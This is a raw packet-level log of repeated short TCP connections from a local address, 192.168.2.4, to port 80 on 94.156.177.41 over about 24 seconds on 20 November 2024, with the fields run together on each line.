                                                                                                                              Nov 20, 2024 10:58:11.593192101 CET5861380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:11.600677013 CET805861394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:11.802206993 CET5862380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:11.809053898 CET805862394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:11.813007116 CET5862380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:11.815056086 CET5862380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:11.821470976 CET805862394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:11.824398994 CET5862380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:11.830007076 CET805862394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:12.566646099 CET805862394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:12.566744089 CET5862380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:12.566922903 CET805862394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:12.567014933 CET5862380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:12.573029041 CET805862394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:12.704860926 CET5862980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:12.711297989 CET805862994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:12.712594986 CET5862980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:12.714579105 CET5862980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:12.720561028 CET805862994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:12.724589109 CET5862980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:12.731090069 CET805862994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:13.483200073 CET805862994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:13.483231068 CET805862994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:13.483556032 CET5862980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:13.484555960 CET5862980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:13.489483118 CET805862994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:13.645864010 CET5863580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:13.651386023 CET805863594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:13.651488066 CET5863580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:13.653477907 CET5863580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:13.658410072 CET805863594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:13.658489943 CET5863580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:13.663367987 CET805863594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:14.396718025 CET805863594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:14.396836996 CET805863594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:14.396851063 CET5863580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:14.397083044 CET5863580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:14.401721001 CET805863594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:14.533857107 CET5864180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:14.538934946 CET805864194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:14.539014101 CET5864180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:14.541049004 CET5864180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:14.545929909 CET805864194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:14.545996904 CET5864180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:14.552557945 CET805864194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:15.281114101 CET805864194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:15.281239986 CET805864194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:15.281301022 CET5864180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:15.281301975 CET5864180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:15.287375927 CET805864194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:15.447985888 CET5865080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:15.452862978 CET805865094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:15.453082085 CET5865080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:15.455130100 CET5865080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:15.460088015 CET805865094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:15.460582972 CET5865080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:15.467375040 CET805865094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:16.229127884 CET805865094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:16.229224920 CET805865094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:16.229259014 CET5865080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:16.229304075 CET5865080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:16.234194040 CET805865094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:16.375708103 CET5865780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:16.380997896 CET805865794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:16.381113052 CET5865780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:16.382903099 CET5865780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:16.391623020 CET805865794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:16.391719103 CET5865780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:16.398523092 CET805865794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:17.138398886 CET805865794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:17.138418913 CET805865794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:17.138536930 CET5865780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:17.138631105 CET5865780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:17.143457890 CET805865794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:17.281317949 CET5866480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:17.286447048 CET805866494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:17.286541939 CET5866480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:17.288305998 CET5866480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:17.293239117 CET805866494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:17.293395996 CET5866480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:17.298394918 CET805866494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:18.031718016 CET805866494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:18.031744957 CET805866494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:18.031800985 CET5866480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:18.031850100 CET5866480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:18.036772013 CET805866494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:18.174050093 CET5867080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:18.179006100 CET805867094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:18.179090023 CET5867080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:18.181020021 CET5867080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:18.185903072 CET805867094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:18.186000109 CET5867080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:18.190952063 CET805867094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:18.916189909 CET805867094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:18.916310072 CET805867094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:18.916384935 CET5867080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:18.916385889 CET5867080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:18.921295881 CET805867094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:19.096482992 CET5867580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:19.101382017 CET805867594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:19.101449013 CET5867580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:19.103928089 CET5867580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:19.112572908 CET805867594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:19.112622023 CET5867580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:19.117506027 CET805867594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:19.983401060 CET805867594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:19.983550072 CET805867594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:19.983625889 CET5867580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:19.983726978 CET5867580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:19.988578081 CET805867594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:20.124213934 CET5868380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:20.129295111 CET805868394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:20.129383087 CET5868380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:20.131119967 CET5868380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:20.135993004 CET805868394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:20.136054039 CET5868380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:20.140944958 CET805868394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:20.889894962 CET805868394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:20.889942884 CET805868394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:20.890028954 CET5868380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:20.890949011 CET5868380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:20.898961067 CET805868394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:21.033669949 CET5868880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:21.038562059 CET805868894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:21.038645983 CET5868880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:21.040473938 CET5868880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:21.045330048 CET805868894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:21.045420885 CET5868880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:21.050288916 CET805868894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:21.775449038 CET805868894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:21.775465965 CET805868894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:21.775557995 CET5868880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:21.775557995 CET5868880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:21.781333923 CET805868894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:21.924076080 CET5869580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:21.929126024 CET805869594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:21.929191113 CET5869580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:21.930898905 CET5869580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:21.935704947 CET805869594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:21.935753107 CET5869580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:21.940573931 CET805869594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:22.695555925 CET805869594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:22.695573092 CET805869594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:22.695646048 CET5869580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:22.695727110 CET5869580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:22.701370001 CET805869594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:22.842622995 CET5870180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:22.848274946 CET805870194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:22.848352909 CET5870180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:22.850301027 CET5870180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:22.855262041 CET805870194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:22.855309963 CET5870180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:22.860260010 CET805870194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:23.591485023 CET805870194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:23.591645956 CET5870180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:23.591701984 CET805870194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:23.591764927 CET5870180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:23.598768950 CET805870194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:23.745284081 CET5870880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:23.751600981 CET805870894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:23.751676083 CET5870880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:23.753654003 CET5870880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:23.760220051 CET805870894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:23.760309935 CET5870880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:23.766341925 CET805870894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:24.491024017 CET805870894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:24.491085052 CET805870894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:24.491168022 CET5870880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:24.491168022 CET5870880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:24.496109009 CET805870894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:24.628012896 CET5871580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:24.632896900 CET805871594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:24.632975101 CET5871580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:24.634911060 CET5871580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:24.639707088 CET805871594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:24.639780998 CET5871580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:24.644699097 CET805871594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:25.390342951 CET805871594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:25.390392065 CET805871594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:25.390471935 CET5871580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:25.390471935 CET5871580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:25.395416975 CET805871594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:25.535748005 CET5872380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:25.540700912 CET805872394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:25.540828943 CET5872380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:25.542803049 CET5872380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:25.548819065 CET805872394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:25.552645922 CET5872380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:25.557611942 CET805872394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:26.277719021 CET805872394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:26.277827978 CET5872380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:26.277853012 CET805872394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:26.277911901 CET5872380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:26.284981966 CET805872394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:26.422089100 CET5873080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:26.427050114 CET805873094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:26.427217960 CET5873080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:26.428895950 CET5873080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:26.433752060 CET805873094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:26.433857918 CET5873080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:26.438831091 CET805873094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:27.285520077 CET805873094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:27.285537958 CET805873094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:27.285551071 CET805873094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:27.285839081 CET5873080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:27.285839081 CET5873080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:27.290813923 CET805873094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:27.425245047 CET5873680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:27.430283070 CET805873694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:27.430397034 CET5873680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:27.432306051 CET5873680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:27.437243938 CET805873694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:27.437349081 CET5873680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:27.442404032 CET805873694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:28.175734043 CET805873694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:28.175757885 CET805873694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:28.175851107 CET5873680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:28.175935984 CET5873680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:28.184408903 CET805873694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:28.314166069 CET5874280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:28.319241047 CET805874294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:28.319336891 CET5874280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:28.321070910 CET5874280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:28.325912952 CET805874294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:28.325967073 CET5874280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:28.330900908 CET805874294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:29.063374043 CET805874294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:29.063529015 CET5874280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:29.063544035 CET805874294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:29.063594103 CET5874280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:29.071403027 CET805874294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:29.207838058 CET5875280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:29.212843895 CET805875294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:29.212955952 CET5875280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:29.215018034 CET5875280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:29.219896078 CET805875294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:29.219984055 CET5875280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:29.224875927 CET805875294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:29.951875925 CET805875294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:29.951946020 CET805875294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:29.951999903 CET5875280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:29.952047110 CET5875280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:29.956897974 CET805875294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:30.120773077 CET5875880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:30.127088070 CET805875894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:30.127156973 CET5875880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:30.130422115 CET5875880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:30.135273933 CET805875894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:30.135328054 CET5875880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:30.140187979 CET805875894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:30.880542994 CET805875894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:30.880714893 CET805875894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:30.880809069 CET5875880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:30.880810022 CET5875880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:30.885831118 CET805875894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:31.017044067 CET5876480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:31.022142887 CET805876494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:31.022232056 CET5876480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:31.024075031 CET5876480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:31.028966904 CET805876494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:31.029058933 CET5876480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:31.034893990 CET805876494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:31.753091097 CET805876494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:31.753211975 CET805876494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:31.753243923 CET5876480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:31.753299952 CET5876480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:31.758131027 CET805876494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:31.894153118 CET5877080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:31.901376009 CET805877094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:31.901473999 CET5877080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:31.903326035 CET5877080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:31.910443068 CET805877094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:31.910532951 CET5877080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:31.917557001 CET805877094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:32.772454977 CET805877094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:32.772475958 CET805877094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:32.772838116 CET5877080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:32.772839069 CET5877080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:32.777802944 CET805877094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:32.907412052 CET5877780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:32.915508986 CET805877794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:32.915622950 CET5877780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:32.917339087 CET5877780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:32.925481081 CET805877794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:32.925546885 CET5877780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:32.933852911 CET805877794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:33.662405968 CET805877794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:33.662426949 CET805877794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:33.662623882 CET5877780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:33.662625074 CET5877780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:33.672123909 CET805877794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:33.802624941 CET5878680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:33.807565928 CET805878694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:33.810271025 CET5878680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:33.812052011 CET5878680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:33.816895008 CET805878694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:33.816973925 CET5878680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:33.821774006 CET805878694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:34.540858030 CET805878694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:34.541049957 CET805878694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:34.541285038 CET5878680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:34.541285038 CET5878680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:34.546153069 CET805878694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:34.735342026 CET5879280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:34.740309954 CET805879294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:34.740379095 CET5879280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:34.742141962 CET5879280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:34.746992111 CET805879294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:34.747067928 CET5879280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:34.751966953 CET805879294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:35.492599010 CET805879294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:35.492608070 CET805879294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:35.492666006 CET5879280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:35.492750883 CET5879280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:35.497560978 CET805879294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:35.628472090 CET5879980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:35.636138916 CET805879994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:58:35.636229992 CET5879980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:58:35.638216972 CET5879980192.168.2.494.156.177.41
